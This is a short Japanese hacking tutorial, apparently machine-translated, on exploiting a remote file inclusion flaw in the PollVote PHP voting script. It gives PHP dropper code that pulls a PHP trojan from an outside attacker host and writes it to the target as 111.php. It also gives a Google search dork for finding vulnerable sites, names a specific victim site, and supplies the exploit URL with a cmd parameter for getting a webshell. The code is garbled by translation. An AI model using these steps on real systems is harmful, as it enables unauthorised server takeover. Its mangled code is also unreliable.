PollVote投票システムの脆弱性利用


PollVoteは投票システムです。今日は安全ではない雑誌を読みました。利用方法を見ました。 
しかし、利用過程は煩雑で、肝心な時にははっきり言っていないと筆者は言っています。 
簡単に言ってください 
まず2つのテキストを作成します。 それぞれcreatfile.txtとphpdoor.txtです。 
creat file.txt内容は書きます。 
<? 
$f=file_ゲットするコンテントhttp://www.hackeroo.com/phpdoor.txt"); 
$ff=fopen(「111.php」、「a」) 
fwrite ($f f,$f); 
fclose($ff) 
? 
phpdoor.txtの内容はPHP木馬を書きます。 
その後はhttp://www.google.com 検索キーワード「pollvote.php?pollname」 
たくさんあります 
検索しますhttp://www.skinnyturd.co.uk/poll/pollvote.php?pollname=Poll.cfg 
彼です 
EXPはhttp://www.[host].com/[path]/pollvote.php?pollname=http://www.[host].com/CMD.gifcmd=ls 
これは利用原理です。 
先ほど話したcreatfile.txtとphpdoor.txtのこの2つのファイルは全部自分の空間にアップロードします。 
実行 http://www.skinnyturd.co.uk/poll ... o.com/creatfile.txt 
このように 
phpdoor.txtの内容は111.phpを生成します。 
これでWEBSHELLをもらいます。 
http://www.skinnyturd.co.uk/poll/111.php